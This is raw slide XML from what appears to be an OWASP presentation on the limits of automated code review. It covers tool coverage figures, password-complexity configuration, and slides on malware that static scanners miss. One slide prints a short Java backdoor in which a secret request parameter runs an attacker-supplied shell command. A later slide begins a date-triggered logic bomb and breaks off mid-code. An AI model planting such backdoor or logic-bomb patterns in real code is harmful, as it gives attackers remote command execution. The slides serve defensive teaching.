              <a:t>OWASP Global Industry Leader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0">
              <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0">
                <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A&amp;P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0">
                <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Senior Manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0">
                <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Ernst &amp; Young</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0">
              <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0">
                <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Application Developer &amp; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0">
                <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Application Security: 12 Years</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0">
              <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="1200" dirty="0">
              <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="1200" dirty="0">
              <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="1200" dirty="0">
              <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="1200" dirty="0">
              <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="1200" dirty="0">
              <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="1200" dirty="0">
              <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8196" name="Picture 4" descr="Square_Logo-Black"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7897813" y="266700"/>
            <a:ext cx="1000125" cy="720725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8197" name="Picture 5" descr="SAMM-cover"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5738813" y="533400"/>
            <a:ext cx="1857375" cy="2476500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 37" descr="OWASP Guide 2.0 (2005)"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="646098" y="5562600"/>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9" name="Picture 39" descr="OWASP World (Nov 2007)"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1258424" y="5776914"/>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0" name="Picture 41" descr="OWASP SpoC 2007"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2054448" y="5562600"/>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1" name="Picture 43" descr="OWASP Top 10 - Ruby on Rails version"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2666774" y="5776914"/>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2" name="Picture 45" descr="OWASP Evaluation And Certification Criteria"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3452592" y="5562600"/>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3" name="Picture 47" descr="OWASP Code Review - 2008 (RC2)"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4064918" y="5776914"/>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4" name="Picture 49" descr="OWASP WebGoat and WebScarab"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4860940" y="5562600"/>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5" name="Picture 51" descr="OWASP CLASP v1.2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5473264" y="5776914"/>
            <a:ext cx="393133" cy="5127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6" name="Picture 2" descr="http://4.bp.blogspot.com/_keJwBEZPgZE/SdgcWlR7KjI/AAAAAAAAB9A/rwJSK9RE974/s400/OWASP+Code+Review+by+OWASP+Foundation+%28Book%29+in+Computers+%26+Internet.png">
            <a:hlinkClick r:id="rId12"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6413500" y="2664310"/>
            <a:ext cx="1808167" cy="261107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7" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7286240" y="1181100"/>
            <a:ext cx="1608365" cy="217829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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1411238"/>
            <a:ext cx="7264400" cy="1828193"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buChar char="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Password Complexity: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2000" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Unless complexity logic is hard coded;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1600200" lvl="3" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" kern="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>RegEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t> stored in configuration file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1600200" lvl="3" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Runtime binding to file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1600200" lvl="3" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Static analysis tools wont see this</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450850" y="268288"/>
            <a:ext cx="6553200" cy="852487"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Code review</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="506637" y="856734"/>
            <a:ext cx="7579319" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buChar char="&lt;"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Key weakness with Automated Code review:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="down.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7256462" y="1782762"/>
            <a:ext cx="1285875" cy="1285875"/>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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E6A59BCA-3994-4EAB-B477-51ECDB6287B8}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1026" name="Content Placeholder 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228600" y="1414463"/>
          <a:ext cx="3657600" cy="3386137"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s109570" name="Chart" r:id="rId4" imgW="7467448" imgH="4200525" progId="Excel.Sheet.8">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>Tools – At Best 45%!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1029" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3695700" y="1163638"/>
            <a:ext cx="5029200" cy="4678362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>MITRE (US Gov research foundation) found that all application security tool vendors’ claims put together cover only 45% of the known vulnerability types (695)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>They found very little overlap between tools, so to get 45% you need them all (assuming their claims are true)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 28"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="552450" y="4876800"/>
            <a:ext cx="8058150" cy="1135063"/>
            <a:chOff x="-2349" y="1508"/>
            <a:chExt cx="8109" cy="1287"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1031" name="Picture 26" descr="Picture 1"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="-2349" y="1508"/>
              <a:ext cx="6552" cy="1287"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1032" name="Picture 27" descr="Picture 2"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4196" y="1558"/>
              <a:ext cx="1564" cy="122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Finally….Malware and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" err="1" smtClean="0"/>
              <a:t>Rootkits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>…Tools just don’t cut it</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln w="3175">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Tools would find it difficult to detect such things:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Logic Bombs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Backdoors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>if ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>( "backdoor" ).equals( "C4A938B6FE01E" ) ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Runtime.getRuntime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>().exec( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>req.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>( "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>" ) );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1600" dirty="0" smtClean="0"/>
              <a:t>To a static scan this is normal code (forgetting Input validation etc)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1600" dirty="0" smtClean="0"/>
              <a:t>For Runtime testing to detect this the correct parameter (backdoor) and value would be required to be used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" dirty="0" smtClean="0"/>
              <a:t>For more on Java Enterprise Malware/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>Rootkits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" dirty="0" smtClean="0"/>
              <a:t> see:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Jeff Williams: http://www.aspectsecurity.com/documents/EnterpriseJavaRootkits.zip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="1600"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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3187700" y="2806700"/>
            <a:ext cx="457200" cy="279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63900" y="2489200"/>
            <a:ext cx="1720343" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Malicious HTTP Parameter</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="1000" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4457700" y="3543300"/>
            <a:ext cx="3302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4673600" y="3860800"/>
            <a:ext cx="1072730" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Command shell</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74763"/>
            <a:ext cx="7924800" cy="2268537"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>if ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>System.currentTimeMillis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>() &gt; 1268784000000) // March 17 2010 (St Patricks Day)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	new Thread( new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Runnable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>() { public void run() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
